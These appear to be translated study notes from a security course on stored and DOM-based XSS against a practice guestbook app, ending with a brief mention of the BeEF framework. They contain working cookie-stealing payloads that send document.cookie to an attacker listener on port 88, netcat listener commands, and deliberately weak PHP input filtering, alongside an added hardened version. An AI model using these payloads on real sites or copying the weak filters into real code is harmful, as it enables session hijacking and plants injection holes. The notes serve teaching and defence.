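Stored XSS
Persisted long-term on the server side
The JavaScript is executed every time a user visits the page
Name: client-side form length limit
Client side, intercepting proxy
<script src=http://1.1.1.1/a.js></script>
a.js source:
var img = new Image();
img.src = "http://1.1.1.1:88/cookies.php?cookie="+document.cookie;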
root@R:~# netstat -pantu | grep 80
tcp 0 0 127.0.0.1:80 0.0.0.0:* LISTEN 771/gsad
tcp 0 0 192.168.1.102:34212 140.98.195.27.80 ESTABLISHED 2840/wget
tcp6 0 127.0.0.1:8080 :::* LISTEN 2387/java
root@R:~# kill 771
root@R:~# service apache2 start
root@R:~# cd /var/www/html/
root@R:/var/www/html# gedit a.js
var img = new Image();
img.src = "http://192.168.1.102:88/cookies.php?cookie="+document.cookie;
root@R:~# nc -nlvp 88
----------------------------------------------------------------------
Low security code
<?php
if (isset($_POST['btnSign']))
{
    $message = trim($_POST['mixMessage']);
    $name = trim($_POST['txtName']);
    // Sanitize message input (SQL escaping only; no HTML encoding is applied)
    $message = stripslashes($message);
    $message = mysql_real_escape_string($message);
    // Sanitize name input (SQL escaping only; no HTML encoding is applied)
    $name = mysql_real_escape_string($name);
    $query = "INSERT INTO guestbook (comment,name) VALUES ('$message','$name');";
    $result = mysql_query($query) or die('<pre>' . mysql_error() . '</pre>');
}
?>
---------------------------------------------------------------------------
Medium security code
<?php
if (isset($_POST['btnSign']))
{
    $message = trim($_POST['mixMessage']);
    $name = trim($_POST['txtName']);
    // Sanitize message input (tags stripped, then HTML-encoded)
    $message = trim(strip_tags(addslashes($message)));
    $message = mysql_real_escape_string($message);
    $message = htmlspecialchars($message);
    // Sanitize name input (removes only the literal string '<script>'; the name is not HTML-encoded)
    $name = str_replace('<script>','',$name);
    $name = mysql_real_escape_string($name);
    $query = "INSERT INTO guestbook (comment,name) VALUES ('$message','$name');";
    $result = mysql_query($query) or die('<pre>' . mysql_error() . '</pre>');
}
?>
----------------------------------------------------------------------------------
High security code
<?php
if (isset($_POST['btnSign']))
{
    $message = trim($_POST['mixMessage']);
    $name = trim($_POST['txtName']);
    // Sanitize message input (HTML-encoded)
    $message = stripslashes($message);
    $message = mysql_real_escape_string($message);
    $message = htmlspecialchars($message);
    // Sanitize name input (now HTML-encoded as well)
    $name = str_replace('<script>','',$name);
    $name = mysql_real_escape_string($name);
    $name = htmlspecialchars($name);
    $query = "INSERT INTO guestbook (comment,name) VALUES ('$message','$name');";
    $result = mysql_query($query) or die('<pre>' . mysql_error() . '</pre>');
}
?>
----------------------------------------------------------------------------------
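A hardened form of the guestbook handler above, as an added example that is not part of the original notes or of the application they study. It enforces the length limit on the server, uses bound parameters instead of string-built SQL, and HTML-encodes at output time. Assumptions: an in-memory SQLite database through PDO stands in for the MySQL guestbook table, and the function names and the 10/50 byte limits are hypothetical.

```php
<?php
// Added example (not the original application's code).
// Assumptions: PDO with the SQLite driver; limits and function names are hypothetical.
// The sample inputs at the bottom are constructed for illustration.
declare(strict_types=1);

const MAX_NAME_LEN = 10;     // bytes
const MAX_MESSAGE_LEN = 50;  // bytes

function open_guestbook(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE guestbook (comment TEXT NOT NULL, name TEXT NOT NULL)');
    return $db;
}

// The form's length limit is only a UI hint, so the server checks it again.
function sign_guestbook(PDO $db, string $name, string $message): bool
{
    $name = trim($name);
    $message = trim($message);
    if ($name === '' || $message === ''
        || strlen($name) > MAX_NAME_LEN || strlen($message) > MAX_MESSAGE_LEN) {
        return false;
    }
    // Bound parameters keep the values out of the SQL text; they are stored unmodified.
    $stmt = $db->prepare('INSERT INTO guestbook (comment, name) VALUES (:comment, :name)');
    return $stmt->execute([':comment' => $message, ':name' => $name]);
}

// Encode when writing into HTML, whatever happened to the value at input time.
function render_guestbook(PDO $db): string
{
    $flags = ENT_QUOTES | ENT_SUBSTITUTE;
    $html = '';
    foreach ($db->query('SELECT name, comment FROM guestbook') as $row) {
        $html .= 'Name: ' . htmlspecialchars($row['name'], $flags, 'UTF-8')
               . '<br />Message: ' . htmlspecialchars($row['comment'], $flags, 'UTF-8') . "<br />\n";
    }
    return $html;
}

$db = open_guestbook();
// Within the limits: stored as typed, shown as inert text by render_guestbook().
sign_guestbook($db, 'alice', 'hello <b>world</b>');
// The script tag quoted in the notes exceeds the server-side name limit and is refused.
sign_guestbook($db, '<script src=http://1.1.1.1/a.js></script>', 'x');
echo render_guestbook($db);
```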
XSS: DOM-based XSS
<script>var img=document.createElement("img");img.src="http://192.168.1.102:88/log?"+escape(document.cookie);</script>
root@R:~# vi 1
<script>var img=document.createElement("img");img.src="http://192.168.1.102:88/log?"+escape(document.cookie);</script>
root@R:~# nc -nlvp 88
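BeEF
Browser attack surface
Applications have broadly moved to a browser/server (B/S) architecture, and the browser has become the universal client program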
Copyright notice: article title: [安全牛 Study Notes] Stored XSS and the BeEF Browser Attack Framework. For reprints, contact the author and cite the source: https://www.elefans.com/dianzi/1726398363a1069028.html